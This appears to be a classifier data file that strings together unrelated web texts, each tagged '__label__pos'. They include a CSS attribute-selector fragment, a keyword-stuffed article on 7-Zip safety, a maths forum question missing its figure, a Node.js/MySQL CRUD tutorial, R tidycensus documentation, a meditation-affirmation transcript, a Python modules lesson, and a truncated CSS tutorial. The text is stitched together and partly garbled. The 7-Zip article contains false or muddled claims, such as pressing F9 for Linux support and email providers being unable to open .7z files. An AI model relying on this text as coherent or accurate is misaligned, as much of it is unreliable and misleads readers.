class="test-section">atribute test </div>     <p class="testworld">text here any thing</p>     <p class="worldtest">text here any thing</p>     <p class="section_test">text here any thing</p>     <p class="sectiontestee">text here any thing</p>     <br>     <h4>Using with id any</h4>     <p id="sectiontesany">text here any thing</p>     <p id="anytest">text here any thing</p> The result will be shown below: CSS [attribute^="value"] Example: We are using attribute value with the ^ (Caret) sign will affected from the beginning value. It will not affect which value from the end of the middle. Below code example for the caret attribute: [class^=test] {             background#0bf;         }         [id^=any] {             background#0b6;         } <p class="text-test">Anything text</p>     <div class="test-section">atribute test </div>     <p class="testworld">text here any thing</p>     <p class="worldtest">text here any thing</p>     <p class="test_section">text here any thing</p>     <p class="sectiontestee">text here any thing</p>     <h4>Using with id any</h4>     <p id="sectiontesany">text here any thing</p>     <p id="anytest">text here any thing</p>     <p id="ssanytest">text here any thing</p> CSS [attribute~="value"] Example: We are using attribute value with the ~ (Tilde) sign. it will affect only where we found a single complete word not required with any other word or any symbols as (-, _, etc). you can see below code example for the tilde selector in the CSS: <style>         [class~=test] {             background#0bf;         }         [title~=test] {             background#0bf;         }         [id~=any] {             background#0b6;         }     </style> <p class="test">Anything text</p>     <p class="testworld">text here any thing</p>     <p class="worldtest">text here any thing</p>     <p class="test_section">text here any thing</p>     <div class="test-section" title="test">atribute test </div>     <p class="sectiontestee">text here any thing</p>     <h4>Using with id any</h4>     <p id="sectiontesany">text here any thing</p>     <p id="any">text here any thing</p>     <p id="ssanytest">text here any thing</p> CSS [attribute*="value"] Example: We are using attribute value with the * (Asterisk) sign it will work with the matched value, it's not required that we used starting or the middle or the ends. Also, we can use it with any symbol as -, _ . you can see below example code:  <style>         [class*=test] {             background#0bf;         }         [title*=test] {             background#0bf;         }         [id*=any] {             background#0b6;         }     </style>  <p class="test">Anything text</p>     <p class="testworld">text here any thing</p>     <p class="worldtest">text here any thing</p>     <p class="tes_section">text here any thing</p>     <div class="test-section" title="test">atribute test </div>     <p class="sectiontestee">text here any thing</p>     <h4>Using with id any</h4>     <p id="sectiontesany">text here any thing</p>     <p id="any">text here any thing</p>     <p id="anttt">here any thing</p>     <p id="ssanytest">text here any thing</p> No comments: Note: Only a member of this blog may post a comment. Copyright Reserved to Anything Learn. Powered by Blogger.
__label__pos
0.99944
How Safe Is 7zip? Is 7-Zip a Virus, and how you can get rid of it? Is 7-Zip a secure program? This is a common query that arises when a user encounters a lesser-known application for the first time. You should know that it is 7zip safe to be protected from viruses. Know about the facts right regarding 7Zip’s genuine score and what it is used for. 7Zip is a program that compresses files. Many people are unfamiliar with its name and are unsure if it is safe to use. The 7zip is safe to use and is used for “File Compression.” It compresses files or files to save disc space and organize congested data, known as file compression. It allows the end-user to take as many files as they wish and compress them into a single file or folder using a compression tool or software. When compared to the total size of all the original files, this file/folder will be substantially smaller. When people talk about compression formats, they almost always limit themselves to RAR and ZIP programs. The most crucial question is 7zip file manager safe? While 7-Zip may sound like a catchy moniker for a computer virus, it is a valuable tool for compressing and decompressing files. If you share a computer for work, someone else might have installed 7-Zip without your knowledge. While leaving 7-Zip on your computer is not a bad idea, you can erase it fast if you do not need it. Must read: Is Steam Unlocked safe? Know about the concerns with the 7z Virus The 7-Zip program will not harm your machine or steal your data. You should install an anti-virus program and keep it running at all times to safeguard your computer from real viruses. The seven zip is safe to download. When you visit unsafe websites, real viruses might arrive in email messages, lurk in files you download, can infect your machine. Windows Defender is a free malware protection program that protects your computer from harmful software attacks, but it is not an anti-virus program. The 7Zip provides the Best Compression Results While ZIP formats are well-known for file compression, they are not the most excellent option. RAR formats are not any better. According to experts, 7z from 7Zip is the best compression format currently available and is 7zip safe. It even allows you to password-protect all of your compression options. It is significantly more dependable and has a smaller file format. Even though the 7z format outperforms ZIP in terms of functionality, ZIP remains the most popular compression tool in the market. It is no surprise that the default compression tool in Microsoft Windows is ZIP. This is also compatible with Mac and Linux, and is it safe to install 7zip from an unknown publisher is still unknown. Most individuals are unaware that there are better file compression alternatives available. The truth is that some people are unaware of 7Zip’s existence until it is pointed out to them. Is 7Zip a safe and reliable program? Is 7Zip a safe and reliable program? One significant advantage of 7Zip over similar programs such as Winrar is that its.7z file extension is far more secure. No email provider can readily open it. With RAR or ZIP, however, the situation is different. Yes, know that is 7zip safe from 7zip.org as it can help you to get many benefits. Most email providers worldwide look into RAR, ZIP, and other compression formats; it cannot be sent through email if it contains executable files. Users will need to supply a separate.exe file in this situation. However, as the 7z file extension is less well-known and used, consumers may be concerned about its integrity, security, and safety. However, hundreds of thousands of individuals have already downloaded and installed 7Zip. Several Redditors, as well as other discussion sites, will back it up. Learn more about 7zip safe or is it malware/spyware reviews. On your Windows PC, the 7-Zip software could be named 7z.exe. The 7z exe  will not harm your machine. When should you use 7-Zip? One of the benefits of using 7-Zip is that it is a free, open-source tool that may be run on any machine. You do not need to register 7-Zip to use it, and thanks to its developer Igor Pavlov, the tool integrates with the Windows shell. That implies that if you right-click a zip file, a menu option will appear that allows you to unzip the file with 7-Zip is safe. The tool makes use of the 7z file format, which compresses files more effectively than other compression utilities. When you upload and download these files, this can help you save time on the Internet, lower your data prices, and free up space on your hard drive and other storage devices. The answer to is 7zip a safe download is yes. One disadvantage of 7-Zip is that it is not as widely used as software supporting classic zip files, supported by most modern operating systems. If you transmit a 7Z file to someone, you may need to explain what it is, how to open it, and even double-check that it is not a virus or something else sinister. Why should you trust 7Zip? There are a lot of theories and a question floating around about is 7zip opener is safe. 7Zip is entirely secure, and it is clean and straightforward, and its UI distinguishes it from the competitors. There is no need to brag or be ostentatious. It is plain and simple to comprehend. It was created to list the files and provide a set of menus and handy toolbars. Other advantages include: • There are no welcome dialogue windows. • There aren’t any sophisticated installation wizards. • also There were no pop-ups or advertisements. • There will be no unpleasant interruptions. • The compression ratio increased by 25% Is there support for Linux-based operating systems? Yes, for support of Linux based operating system, you need to hit F9 if you prefer something other than the primary user interface. The 7z will morph into a file manager with two panes. How to use 7Zip? It is simple to use a 7z zip file for compressing, opening, and splitting files. On your PC, you may easily verify files. The technique for compressing files is straightforward. You can use both the graphical user interface and the command line to operate the software. You can follow the procedures below to use the software using the GUI: Step 1: Make a list of the files you wish to extract. Step 2: Make a right-click with your mouse. This will take you to a new menu. Step 3: Hover your mouse over the “7-Zip” option. Step 4: Select “Extract Here” from the drop-down menu. This opens up a new window that displays the progress and the amount of time left before the file is extracted. Step 5: Wait for it to complete. The extracted file appears in the same folder as your other RAR or 7-Zip files. Step 6: A new 7-Zip window will appear after you click the “Extract” button. This prompts you to choose a location for your file to be saved. Step 7: Wait for the application to finish the unzipping/unrar procedure, and then you are done. In terms of sheer performance and reliability, 7Zip outperforms competing archiving and file compressing software. If you don’t mind the archaic interface, 7Zip should be the first choice for everyone. You should know that 7zip is safe, and file compression allows files to be transferred over the Internet more easily and rapidly. The 7Zip application compresses and encrypts files, allowing more data to be delivered more securely. 7Zip employs AES 256-bit encryption, which is a practical data security approach. To appreciate how secure this is, you must first comprehend the AES standard and encryption key strength. How can you do Encryption with 7 Zip? How can you do Encryption with 7 Zip? Encryption with AES The researchers define an encryption approach that employs a sophisticated encryption procedure and nearly unbreakable encryption keys and provides an answer to is 7zip, a safe format. The AES encryption standard was created in response to the growing use of digital communications by the federal government and financial institutions, which prompted a robust encryption system to secure state secrets, medical records, and financial data. 7Zip Encryption and Archiving The 7Zip program is a file archiving and encryption program which tells about how safe is 7zip. The7Zip compresses data into a tiny file that may be archived. You can run a group of files using 7Zip, compress them into smaller sizes, and put them in a single file for transportation. You can encrypt the file with the correct encryption key can open it. Encryption with 256-bit AES The AES specification specifies 128-, 192-, and 256-bit encryption levels, which would take billions of years to crack using brute-force attacks, and emphasizes knowledge about is 7zip safe and free. This is a robust encryption standard that is used for government communications. Because the bar is open to everyone to implement, AES encryption gives excellent protection to anyone who employs it as a security measure, not just the government. 7Zip AES Encryption Strength 7Zip employs AES 256-bit encryption, which is the most advanced form of AES. This means that a file is deemed impenetrable without the encryption key, and guessing the key by brute force attacks is also tricky unless a specific strategy for cracking AES keys is uncovered. However, knowing is 7zip safe and free is vital because 256-bit Encryption is computationally expensive and time and energy-intensive to perform; encrypting and decrypting big files or messages, especially over the Internet, may take some time. How to remove 7-Zip from your computer? To uninstall 7-Zip, you should use the “Windows” key to bring up the Start screen. To open the Programs and Features window, right-click the 7-Zip icon and select “Uninstall”, and you will get to know 7zip safe avast. This window shows all of your installed apps, with 7-Zip, the app you right-clicked, highlighted. Windows removes 7-Zip from your machine when you click the “Uninstall/Change” button on the dialogue. Make sure 7-Zip is highlighted before hitting that button; you don’t want to uninstall the wrong program. After uninstalling 7-Zip, you do not need to restart your computer. Different types of Compression Techniques As most software you download is in zip format, you will be more productive if you use a zip program. People might also email you compressed files with documents, photos, and even enormous databases. WinZip and JZip are two such apps that can compress and decompress files. You can also use Windows File Explorer to extract everything from a zipped folder. To do so, choose a compressed folder and then go to “Compressed Folder Tools” and “Extract All.” Select the file you want to zip in Windows File Explorer and then click “Zip.” The conventional Zip format is also supported by other operating systems, such as Apple macOS and many Linux variants. How to Open a WinZip? Many users use WinZip to open compressed zip files on Microsoft Windows and even Mac computers. However, most modern systems have built-in operating system capabilities that can open zip files without the application. For some people, third-party zip programs still have some advantages, such as cloud storage integration and support for different types of compression. You may open a zip file on a Windows or Mac computer without using any additional software by double-clicking it. Use Windows to Open Zip Files Zip files are widely used to compress one or more files to store them more compactly or send them over the Internet more quickly and provides you answer to is 7zip 1415 safe. They are frequently available for downloading photographs or software from various websites, and they are also often distributed as email attachments. It is essential to know about is SourceForge 7zip safe because the zip file system and format are defined; a wide range of tools can read and write them. Note that zip files might include malware, so if you receive one unexpectedly, such as in an email, be cautious until you confirm its safety by contacting the sender. If you acquire a zip file or come across one on your computer in any other way, you may quickly open it with Windows’ built-in capabilities. You may either extract all of the files in the zipped folder by right-clicking on it and selecting “Extract All”, or you can double-click it and drag any files inside to your desktop or another chosen location. On Windows, you can also create a zip file by right-clicking a file or folder and selecting “Compressed (zipped) folder” from the “Send to” menu. Know about how to use a Mac to Open Zip Files You may also double-click a zip file to open it without having to use any extra software. On Windows, macOS, or another operating system, a zip file read or generated will act similarly, and yes, 7zip Encryption is safe. Zip Utilities from Third Parties You can get several third-party compression applications for free or for a fee if you like. WinZip, 7-Zip, and WinRAR are among them. Please read carefully about 7zip safe or is it malware/spyware peoples reviews. Many applications can handle various file formats, such as WinRAR’s RAR file format or 7-Zip’s.7z file format. Many have alternative interfaces that can be beneficial if you need to create particularly complex zip files interact with zip files frequently. Use of cloud services Many zip files also have connectivity with cloud services like Dropbox and OneDrive, allowing users to upload compressed files effortlessly. Some even offer additional features like dividing extensive recordings into smaller chunks to fit specific types of recordable media like CDs or small USB memory sticks. Faq How safe is 7zip? The 7-Zip program will not harm your machine or steal your data. You should know that install an anti-virus program and keep it running at all times to safeguard your computer from real viruses. When you visit unsafe websites, real viruses might arrive in email messages, lurk in files you download, and infect your machine. How safe is 7zip Encryption? 7Zip employs AES 256-bit encryption, which is the most advanced form of AES. This means that a file is deemed impenetrable without the encryption key, and guessing the key by brute force attacks is also tricky unless a specific strategy for cracking AES keys is uncovered. Leave a Comment
__label__pos
0.70293
Node JS MySQL Crud operations Node JS MySQL Crud operations Simple crud operations with NodeJS MySQL To perform crud operations with NodeJS MySQL we’ll create a post management system by using NodeJS and MySQL. In this post management system, a user can create posts, read posts, update posts and delete posts. So let’s create this – Step – 1 First, you need to install NodeJS on your system, after that create a new folder on your desktop and named it what you want, here I named it nodemysql. After that, inside the newly created folder initialize NPM. How to initialize NPM ? open your terminal select the folder where you want to initialize NPM and after selecting the folder run npm init command on your terminal. click here to learn in details. Step – 2 After completing the step one, now install the four dependencies – • express – npm install express --save • mysql2 – npm install mysql2 --save • body-parser – npm install body-parser --save • twig template engine – npm install twig --save My package.json File { "name": "nodemysql", "version": "1.0.0", "description": "", "main": "app.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "Webtutorials.ME", "license": "MIT", "dependencies": { "body-parser": "^1.18.3", "express": "^4.16.4", "mysql2": "^1.6.4", "twig": "^1.12.0" } } Step – 3 Now time to configure our database. So open your mysqlDB or MariaDB and also you can use the XAMPP or WAMP server, and then create a new database called node_mysql. Use the below SQL query to creates posts table into the node_mysql Database and it also creates the posts table structure. CREATE TABLE `posts` ( `id` int(11) NOT NULL, `title` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL, `content` text COLLATE utf8mb4_unicode_ci NOT NULL, `author` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL, `created_at` date NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; ALTER TABLE `posts` ADD PRIMARY KEY (`id`); ALTER TABLE `posts` MODIFY `id` int(11) NOT NULL AUTO_INCREMENT; Posts table structure Step – 4 After completing the database configuration, Now we’ll creating our files. But before creating our files let’s take a look at the nodemysql folder structure. nodejs mysql folder structure Creating files First, we’ll create the database.js file inside the config folder for making the connection with our database. database.js const mysql = require('mysql2'); const connection = mysql.createConnection({ host : 'localhost', // MYSQL HOST NAME user : 'root', // MYSQL USERNAME password : '', // MYSQL PASSWORD database : 'node_mysql' // MYSQL DB NAME }); module.exports = connection; After that, we’ll create the app.js file. This file name is app.js because in my package.json file you can see "main": "app.js". app.js const express = require('express'); const app = express(); const twig = require('twig'); const bodyParser = require('body-parser'); // IMPORT DB CONNECTION const connection = require('./config/database'); // SET VIEW ENGINE app.set('view engine','html'); app.engine('html', twig.__express); app.set('views','views'); // USE BODY-PARSER MIDDLEWARE app.use(bodyParser.urlencoded({extended:false})); app.get('/', (req, res) => { // FETCH ALL THE POSTS FROM DATABASE connection.query('SELECT * FROM `posts`', (err, results) => { if (err) throw err; // RENDERING INDEX.HTML FILE WITH ALL POSTS res.render('index',{ posts:results }); }); }); // INSERTING POST app.post('/', (req, res) => { const title = req.body.title; const content = req.body.content; const author_name = req.body.author_name; const post = { title: title, content: content, author: author_name, created_at: new Date() } connection.query('INSERT INTO `posts` SET ?', post, (err) => { if (err) throw err; console.log('Data inserted'); return res.redirect('/'); }); }); // EDIT PAGE app.get('/edit/:id', (req, res) => { const edit_postId = req.params.id; // FIND POST BY ID connection.query('SELECT * FROM `posts` WHERE id=?',[edit_postId] , (err, results) => { if (err) throw err; res.render('edit',{ post:results[0] }); }); }); // POST UPDATING app.post('/edit/:id', (req, res) => { const update_title = req.body.title; const update_content = req.body.content; const update_author_name = req.body.author_name; const userId = req.params.id; connection.query('UPDATE `posts` SET title = ?, content = ?, author = ? WHERE id = ?', [update_title, update_content, update_author_name, userId], (err, results) => { if (err) throw err; if(results.changedRows === 1){ console.log('Post Updated'); return res.redirect('/'); } }); }); // POST DELETING app.get('/delete/:id', (req, res) => { connection.query('DELETE FROM `posts` WHERE id = ?', [req.params.id], (err, results) => { if (err) throw err; res.redirect('/'); }); }); // SET 404 PAGE app.use('/',(req,res) => { res.status(404).send('<h1>404 Page Not Found!</h1>'); }); // IF DATABASE CONNECTION IS SUCCESSFUL connection.connect((err) => { if (err) throw err; app.listen(3000); }); In the app.js you can see that we are not validating form data. If you wish I make a tutorial on how to validate form data with NodeJS then just drop me a comment. Creating views Now inside the views folder we’ll create our views – index.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>CRUD with Node.JS + MySQL</title> <!-- USING BOOTSTRAP FOR STYLING USER INTERFACE --> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/css/bootstrap.min.css" integrity="sha384-GJzZqFGwb1QTTN6wy59ffF1BuGJpLSa9DkKMp0DgiMDm4iYMj70gZWKYbI706tWS" crossorigin="anonymous"> <style> .customRow{ background-color: #f2f2f2; padding: 20px; } </style> </head> <body> <div class="customRow"> <div class="container"> <div class="card"> <div class="card-body"> <h1 class="text-center">Post Management System</h1> <hr> <form action="" method="POST"> <div class="form-group"> <label for="post_title">Post Title</label> <input type="text" name="title" class="form-control" placeholder="Title" id="post_title" required> <label for="post_content">Post Content</label> <textarea name="content" class="form-control" placeholder="Write something" id="post_content" required></textarea> <label for="author_name">Author Name</label> <input type="text" name="author_name" class="form-control" placeholder="Enter author name" id="author_name" required> <br> <input type="submit" value="POST" class="btn btn-primary"> </div> </form> <hr> <h2 class="text-center">All Posts</h2> <!-- IF HAVE ANY POSTS --> {% if posts|length > 0 %} <!-- LOOPING ALL THE POSTS --> {% for post in posts %} <div class="card"> <div class="card-body"> <h5 class="card-title">{{ post.title | e }} | <small><span>{{ post.created_at | date("d M, Y") }}</span></small></h5> <p class="card-text text-justify">{{ post.content | e }}</p> <span class="float-right"><strong>By</strong>, {{ post.author | e }}</span> <a href="/edit/{{ post.id | e }}" class="btn btn-light">✎ Edit</a> <a href="/delete/{{ post.id | e }}" class="btn btn-danger">Delete</a> </div> </div> <hr> {% endfor %} {% else %} <h4>No Post Found !</h4> {% endif %} </div> </div> </div> </div> <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.6/umd/popper.min.js" integrity="sha384-wHAiFfRlMFy6i5SRaxvfOCifBUQy1xHdJ/yoi7FRNXMRBu5WHdZYu1hA6ZOblgut" crossorigin="anonymous"></script> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/js/bootstrap.min.js" integrity="sha384-B0UglyR+jN6CkvvICOB2joaf5I4l3gm9GU6Hc1og6Ls7i6U/mkkaduKaBhlAXv9k" crossorigin="anonymous"></script> </body> </html> edit.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Edit Post</title> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/css/bootstrap.min.css" integrity="sha384-GJzZqFGwb1QTTN6wy59ffF1BuGJpLSa9DkKMp0DgiMDm4iYMj70gZWKYbI706tWS" crossorigin="anonymous"> <style> .customRow{ background-color: #f2f2f2; padding: 20px; } </style> </head> <body> <div class="customRow"> <div class="container"> <div class="card"> <div class="card-body"> <h1 class="text-center">Post Management System</h1> <hr> {% if post is empty %} <h3>Invalid Post ID</h3> {% else %} <form action="" method="POST"> <div class="form-group"> <label for="post_title">Title</label> <input type="text" name="title" class="form-control" placeholder="Title" id="post_title" value="{{ post.title | e }}" required> <label for="post_content">Post Content</label> <textarea style="height:100px;" name="content" class="form-control" placeholder="Write something" id="post_content" required>{{ post.content | e }}</textarea> <label for="author_name">Author Name</label> <input type="text" name="author_name" class="form-control" placeholder="Enter author name" id="author_name" value="{{ post.author | e }}" required> <br> <input type="submit" value="UPDATE" class="btn btn-success"> </div> </form> {% endif %} </div> </div> </div> </div> <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.6/umd/popper.min.js" integrity="sha384-wHAiFfRlMFy6i5SRaxvfOCifBUQy1xHdJ/yoi7FRNXMRBu5WHdZYu1hA6ZOblgut" crossorigin="anonymous"></script> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/js/bootstrap.min.js" integrity="sha384-B0UglyR+jN6CkvvICOB2joaf5I4l3gm9GU6Hc1og6Ls7i6U/mkkaduKaBhlAXv9k" crossorigin="anonymous"></script> </body> </html> Completed. Download this project from GitHub Learn also: CRUD with Node JS and MongoDB CRUD with Node JS and Mongoose Leave a Reply Your email address will not be published. Required fields are marked *
__label__pos
0.937063
Obtain data and feature geometry for the American Community Survey get_acs( geography, variables = NULL, table = NULL, cache_table = FALSE, year = 2022, output = "tidy", state = NULL, county = NULL, zcta = NULL, geometry = FALSE, keep_geo_vars = FALSE, shift_geo = FALSE, summary_var = NULL, key = NULL, moe_level = 90, survey = "acs5", show_call = FALSE, ... ) Arguments geography The geography of your data. variables Character string or vector of character strings of variable IDs. tidycensus automatically returns the estimate and the margin of error associated with the variable. table The ACS table for which you would like to request all variables. Uses lookup tables to identify the variables; performs faster when variable table already exists through load_variables(cache = TRUE). Only one table may be requested per call. cache_table Whether or not to cache table names for faster future access. Defaults to FALSE; if TRUE, only needs to be called once per dataset. If variables dataset is already cached via the load_variables function, this can be bypassed. year The year, or endyear, of the ACS sample. 5-year ACS data is available from 2009 through 2022; 1-year ACS data is available from 2005 through 2022, with the exception of 2020. Defaults to 2022. output One of "tidy" (the default) in which each row represents an enumeration unit-variable combination, or "wide" in which each row represents an enumeration unit and the variables are in the columns. state An optional vector of states for which you are requesting data. State names, postal codes, and FIPS codes are accepted. Defaults to NULL. county The county for which you are requesting data. County names and FIPS codes are accepted. Must be combined with a value supplied to `state`. Defaults to NULL. zcta The zip code tabulation area(s) for which you are requesting data. Specify a single value or a vector of values to get data for more than one ZCTA. Numeric or character ZCTA GEOIDs are accepted. When specifying ZCTAs, geography must be set to `"zcta"` and `state` must be specified with `county` left as `NULL`. Defaults to NULL. geometry if FALSE (the default), return a regular tibble of ACS data. if TRUE, uses the tigris package to return an sf tibble with simple feature geometry in the `geometry` column. keep_geo_vars if TRUE, keeps all the variables from the Census shapefile obtained by tigris. Defaults to FALSE. shift_geo (deprecated) if TRUE, returns geometry with Alaska and Hawaii shifted for thematic mapping of the entire US. Geometry was originally obtained from the albersusa R package. As of May 2021, we recommend using tigris::shift_geometry() instead. summary_var Character string of a "summary variable" from the ACS to be included in your output. Usually a variable (e.g. total population) that you'll want to use as a denominator or comparison. key Your Census API key. Obtain one at https://api.census.gov/data/key_signup.html moe_level The confidence level of the returned margin of error. One of 90 (the default), 95, or 99. survey The ACS contains one-year, three-year, and five-year surveys expressed as "acs1", "acs3", and "acs5". The default selection is "acs5." show_call if TRUE, display call made to Census API. This can be very useful in debugging and determining if error messages returned are due to tidycensus or the Census API. Copy to the API call into a browser and see what is returned by the API directly. Defaults to FALSE. ... Other keyword arguments Value A tibble or sf tibble of ACS data Examples if (FALSE) { library(tidycensus) library(tidyverse) library(viridis) census_api_key("YOUR KEY GOES HERE") tarr <- get_acs(geography = "tract", variables = "B19013_001", state = "TX", county = "Tarrant", geometry = TRUE, year = 2020) ggplot(tarr, aes(fill = estimate, color = estimate)) + geom_sf() + coord_sf(crs = 26914) + scale_fill_viridis(option = "magma") + scale_color_viridis(option = "magma") vt <- get_acs(geography = "county", variables = "B19013_001", state = "VT", year = 2019) vt %>% mutate(NAME = gsub(" County, Vermont", "", NAME)) %>% ggplot(aes(x = estimate, y = reorder(NAME, estimate))) + geom_errorbar(aes(xmin = estimate - moe, xmax = estimate + moe), width = 0.3, size = 0.5) + geom_point(color = "red", size = 3) + labs(title = "Household income by county in Vermont", subtitle = "2015-2019 American Community Survey", y = "", x = "ACS estimate (bars represent margin of error)") }
__label__pos
0.94192
User Forum Subject :IMO    Class : Class 5 Find the total shaded area of the figure made up of identical squares. A 38 cm2 B 243 cm2 C 171 cm2 D 196 cm2 Ans 1: Class : Class 6 Ans 2: (Master Answer) Class : Class 1 The correct answer is C. Post Your Answer
__label__pos
0.772329
Affirmative Self-programming Meditation J Michael Murphy and today is Thursday November 1st 2018 and in this video I will be discussing and introducing affirmative self programming meditation the purpose of affirmative or self programming meditation in metaphysics and mysticism is to reprogram the mind for success and prosperity both internally and externally negative thought patterns and beliefs are nullified. And replaced with positive thoughts affirmative self programming is designed to target the subconscious mind which is involved in. Over 90% of our conscious decision decision-making our will and our intentions are word or logos so to speak is programmed into the subconscious mind through the repetition of mystically structured affirmations mystical meditation can then be performed to quiet the surface conscious mind making it more receptive to any divine guidance knowledge and/or energy being sent through the subconscious from the higher mind as mentioned affirmation should be mystically worded to have the desired. Effect this means they should be stating that what you desire is already so already exists as reality thanks should also be given further reaffirming that the desire already exists as a reality whether thanks. To God the Higher Self the universe etc affirmation should be repeated daily while in a deep state of mystical meditation when there is an open. Communication between the surface conscious layer of the minds our carnal mind and the subconscious and the deeper levels of divine affirmations may also be written down and carried on your person in your pocket in your. Bag and these can be taken out and read aloud during the day and. For increased effects I should mention that affirmations may also be spoken aloud during the meditation visualization is also utilized both in light meditative states and deep mystical meditative States visualize yourself as existing and living your life having the. Things or qualities that you desire affirmative self programming meditation works because it is based in practical mysticism and mystical power mystical power is having the knowledge that or a higher source the cosmic minds the higher mind the true self whatever you want to call it it’s having knowledge that. This power exists within each mind and that locating and tapping into that power leads to limitless limitless possibilities for reality and mystics truly do believe this and. That is the motivation behind their never-ending quests or communion with God Jesus himself said that the miracles he performs even the divine. Wisdom he spoke was not his it was not his own but it was actually that of the father that dwells in him and Jesus also said that all the. Did all the things he said that we can do them to and better so Jesus told us that if we have faith when we pray we will be given whatever we ask for so do you believe do you believe it’s hard to have faith whether whether it’s a. Christian or religious based faith or whether. It’s even as an atheist but you are following this kind of metaphysical path and you want to have faith in the ultimate power of your mind you know maybe you believe that the mind is capable of doing miraculous things but. Python Programming 19 Modules Okay guys in this video I’m gonna talk to you about modules so sometimes you’re gonna have functions that you’re gonna want to use over and over and over again maybe not only in the same program but maybe in different programs so instead of having to rewrite the function every single time what you can do is you can throw. All the functions that you’re gonna use over and over again in a separate file and then just. Whatever program you’re working on so not only does it help you from writing a bunch of code but it also helps organize your programming a little bit better and I’m gonna. Show you guys how to make those right now so again like I said right now we’re gonna make a macho that’s just a function included in another file so. We’re gonna need another file so right click on your project and your write new Python file so I’ll just name this some I don’t know like tuna so tuna dot P Y dy is the extension for a Python file and then hit OK so now our. Project has two files in the same directory this main which is our main program the one we’ve. Been working on and this tuna is the one we just made and we can just delete that that doesn’t really matter so in. This tune file I’m just gonna make a really simple function right now so def now I’ll just call it you can call it anything you want I’m just name it fish because I don’t know modules name to us so why the heck not all right so this function is. Just kind of like prints an island screen easy colons all right I’ll just say I am a tuna fish there we go all right so say that we wanted to use this function over and over and over again so we just wrote it once we threw in a module. And we’re good to go so now whenever we actually want to use it go back to your main program and what you can do is in order to use any of. The stuff in your module you first need to say ok we want to include another file so how do we do that well we actually type the word import and that means go get a file from somewhere else. In use it in this program so then it says okay well what’s the name of your file well it’s just called tuna and you don’t write py because whenever you import a module it knows that. Of course it’s another Python. Python file so again no need to include that py don’t do it it knows so right now in this program we’re working on we included basically this basically what’s going. On behind the scenes is it goes to this file copies it and paste it right in here even. Though you know you don’t see it that’s kind of a good example so if you just run this right. Now check it out nothing happens why is that well we included this but we didn’t say to actually use this function right in here so. In order to use functions that are inside modules we just can’t write fish like this even though. This function is named finish right here check it out if we. Run it it says okay fish is not defined so why can’t we do that well the reason for that is say we were including a bunch of modules maybe um there’s some modules that we wrote maybe some that our friends wrote maybe some. That some random people on the internet wrote well maybe each of those modules each have a function. 10 Simple Css Code Examples You Can Learn In 10 Minutes Once you’ve started dabbling in HTML, you’ll probably be interested in adding more power to your web pages. CSS is the best way to do that. CSS lets you apply changes across your entire page without having to use lots of inline HTML styles. We’ll go over how to create an inline stylesheet so you can practice your CSS skills, and then we’ll move onto 10 simple examples that will show you how to do a few basic things. From there, your imagination is the limit! If you want a slightly more technical introduction, be sure to check out 5 Baby Steps to Learning CSS & Becoming a Kick-Ass CSS Sorcerer. Inline Stylesheet Every HTML document contains a <head> tag. That head section is where your inline CSS stylesheet goes. Here’s what it’ll look like: <head> All of your CSS declarations. </head> Put that at the top of your document, fill it with your CSS, and you’re set to go. 1. Easy Paragraph Formatting The cool thing about styling with CSS is that you don’t have to specify a style every time you create an element. You can just say “all paragraphs should have this particular styling” and you’re good to go. Here’s an example of how you might do that. Let’s say you want every paragraph (that’s everything with a <p> HTML tag) on your page to be slightly larger than usual. And dark grey, instead of black. Here’s how you would do that with CSS: p { font-size: 120%; color: dimgray; } That’s all there is to it. Now, whenever the browser renders a <p> paragraph, the text will inherit the size (120 percent of normal) and the color (“dimgray”). If you’re curious as to which plain-text colors you can use, check out this CSS color list from Mozilla. 2. Change Letter Case Okay, so now that we’ve seen how to make a change to every paragraph, let’s look at how we can be a bit more selective. Let’s create a designation for paragraphs that should be in small caps. Here’s how we’d do that: p.smallcaps { font-variant: small-caps; } To make a paragraph that’s entirely in small caps, we’ll use a slightly different HTML tag. Here’s what it looks like: <p class="smallcaps">Your paragraph here.</p> As you can see, adding a dot and a class name to any specific element in CSS specifies a sub-type of that element defined by a class. You can do this with text, images, links, and just about anything else. If you want to change the case of a set of text to a specific case, you can use these CSS lines: text-transform: uppercase; text-transform: lowercase; text-transform: capitalize; The last one capitalizes the first letter of every sentence. 3. Change Link Colors Let’s try changing the style of something other than a full paragraph. There are four different colors a link can be assigned: its standard color, its visited color, its hover color, and its active color (which it displays while you’re clicking on it). Here’s how we might change those: a:link { color: gray; } a:visited { color: green; } a:hover { color: rebeccapurple; } a:active { color: teal; } Note that each “a” is followed by a colon, not a dot. Each one of those declarations changes the color of a link in a specific context. There’s no need to change the class of a link to get it to change color. It will all be determined by the user and the state of the link. 4. Remove Link Underlines While underlined text pretty clearly indicates a link, it sometimes looks nicer to scrap that underline. This is accomplished with the “text-decoration” attribute. Here’s how we’d get rid of underlines on links: a { text-decoration: none; } Anything with the link (“a”) tag will remain un-underlined. Want to underline it when the user hovers over it? Just add this below: a:hover { text-decoration: underline; } You could also add this text-decoration to active links to make sure the underline doesn’t disappear when the link is clicked. 5. Make a Link Button If you want to attract more attention to your link, using a link button is a great way to go about it. This one requires a few more lines, but we’ll go over them each individually: a:link, a:visited, 